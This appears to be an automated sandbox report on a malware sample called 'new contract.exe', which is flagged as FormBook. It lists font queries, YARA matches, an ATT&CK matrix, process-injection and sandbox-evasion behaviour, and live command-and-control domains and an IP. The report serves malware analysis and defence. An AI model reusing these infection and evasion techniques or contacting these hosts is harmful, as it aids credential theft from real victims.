          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00685FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,5_2_00685FE5
          Source: C:\Users\user\Desktop\new contract.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_00684B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx,5_2_00684B96

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts522
          Process Injection          		1
          Disable or Modify Tools          		LSASS Memory231
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Abuse Elevation Control Mechanism          		41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		1
          Access Token Manipulation          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script522
          Process Injection          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Deobfuscate/Decode Files or Information          		Cached Domain Credentials1
          System Network Configuration Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Abuse Elevation Control Mechanism          		DCSync1
          System Network Connections Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
          Obfuscated Files or Information          		Proc Filesystem213
          System Information Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
          Software Packing          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1531093 Sample: new contract.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 33 www.uickautoquote.net 2->33 35 www.sofaerb.shop 2->35 37 9 other IPs or domains 2->37 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 10 other signatures 2->47 11 new contract.exe 3 2->11         started        signatures3 process4 file5 31 C:\Users\user\...\new contract.exe.log, ASCII 11->31 dropped 59 Injects a PE file into a foreign processes 11->59 15 new contract.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 2 other signatures 15->67 18 explorer.exe 60 1 15->18 injected process9 dnsIp10 39 www.igmoto.info 89.31.143.90, 49979, 80 QSC-AG-IPXDE Germany 18->39 49 Uses netstat to query active network connections and open ports 18->49 22 NETSTAT.EXE 18->22         started        25 autofmt.exe 18->25         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 57 Switches to a custom stack to bypass stack traces 22->57 27 cmd.exe 1 22->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          new contract.exe50%ReversingLabsByteCode-MSIL.Trojan.SnakeLogger
          new contract.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://www.fontbureau.com/designers0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
          https://word.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://www.fontbureau.com/designersG0%URL Reputationsafe
          http://www.fontbureau.com/designers/?0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.com/designers?0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.fonts.com0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.igmoto.info
          		89.31.143.90
          		truetrue
            		unknown
            www.livialiving.online
            		unknown
            		unknowntrue
              		unknown
              www.arklife.shop
              		unknown
              		unknowntrue
                		unknown
                www.uickautoquote.net
                		unknown
                		unknowntrue
                  		unknown
                  www.sofaerb.shop
                  		unknown
                  		unknowntrue
                    		unknown
                    www.ldkp.net
                    		unknown
                    		unknowntrue
                      		unknown
                      www.innivip.bio
                      		unknown
                      		unknowntrue
                        		unknown
                        www.r64mh1.vip
                        		unknown
                        		unknowntrue
                          		unknown
                          www.olar-systems-panels-61747.bond
                          		unknown
                          		unknowntrue
                            		unknown
                            www.aycare-service-99683.bond
                            		unknown
                            		unknowntrue
                              		unknown
                              www.aser-cap-hair-growth.today
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                www.aycare-service-99683.bond/c89p/true
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://aka.ms/odirmrexplorer.exe, 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.oviepicker.net/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://www.hinawinner.topexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.livialiving.online/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://www.olar-systems-panels-61747.bondexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.arklife.shopReferer:explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.igmoto.info/c89p/www.olar-systems-panels-61747.bondexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.aycare-service-99683.bond/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://www.aycare-service-99683.bond/c89p/www.x-design-courses-29670.bondexplorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.aser-cap-hair-growth.today/c89p/explorer.exe, 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		unknown
